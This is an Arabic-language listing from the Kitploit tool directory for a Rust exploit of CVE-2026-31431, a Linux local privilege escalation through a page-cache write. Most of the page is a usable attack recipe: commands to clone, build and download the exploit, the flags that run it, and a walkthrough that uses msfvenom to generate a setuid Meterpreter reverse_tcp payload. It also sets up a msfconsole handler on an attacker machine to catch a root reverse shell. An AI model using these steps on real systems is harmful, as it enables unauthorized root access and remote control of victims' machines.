Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431-Linux-Copy-Fail — # استغلال رفع صلاحيات محلي مبني على Rust لثغرة CVE-2026-31431، يتيح تنفيذ شيلكود مخصص مثل Meterpreter على أنظمة Linux. | Kitploit
أدوات/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31431-Linux-Copy-Fail

# استغلال رفع صلاحيات محلي مبني على Rust لثغرة CVE-2026-31431، يتيح تنفيذ شيلكود مخصص مثل Meterpreter على أنظمة Linux.

عرض المستودعالموقع الإلكتروني
56214منذ 4 أشهرتمت المراجعة من قبل Kitploit

CVE-2026-31431 - استغلال فشل النسخ في لينكس (Rust)

تنفيذ بلغة Rust لاستغلال تصعيد الصلاحيات المحلية لثغرة CVE-2026-31431 (فشل النسخ).

يسمح بتنفيذ شيلكود مخصص (مثل Meterpreter)

مقدمة

كشف Xint عن ثغرة CVE-2026-31431، وهي ثغرة كتابة عشوائية في ذاكرة التخزين المؤقت للصفحات (page cache) تربط بين AF_ALG و splice() لتحقيق بدائية كتابة بحجم 4 بايت.

المصدر: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

إخلاء مسؤولية

تم تطوير هذا المشروع كجزء من اهتمامي الشخصي بدراسة الأمن السيبراني. ومع ذلك، قد يُساء استخدامه لأغراض خبيثة.

يرجى عدم استخدام هذه الأداة في أي أنشطة غير قانونية.

المؤلف غير مسؤول عن أي إساءة استخدام لهذا البرنامج.

شكر وتقدير

  • theori-io/copy-fail-CVE-2026-31431

ملاحظة: العمل الأصلي يستخدم شيلكود مضغوط/مشفر (مثل /bin/sh). في هذا التنفيذ، استبدلته بشيلكود /bin/bash خام (غير مضغوط)، مما يسهل تخصيصه أو استبداله مباشرة بحمولات يقدمها المستخدم.

كيفية الترجمة (البناء)

استنسخ المشروع، ثم نفّذ build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

الاستخدام

قم بتنزيل وفك ضغط حزمة الإصدار:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

توفر الملفات الثنائية الخيارات التالية:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

العرض التوضيحي

اختبار الثغرة

على الجهاز المصاب:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

الاستغلال

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

استخدم الأمر التالي (اضبط PrependSetUid على True) لتوليد حمولة Meterpreter:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

على جهاز المهاجم (Kali Linux):

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

على الجهاز المصاب:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

الإصدارات المتأثرة

  • Ubuntu
  • Redhat
تنزيل الأداة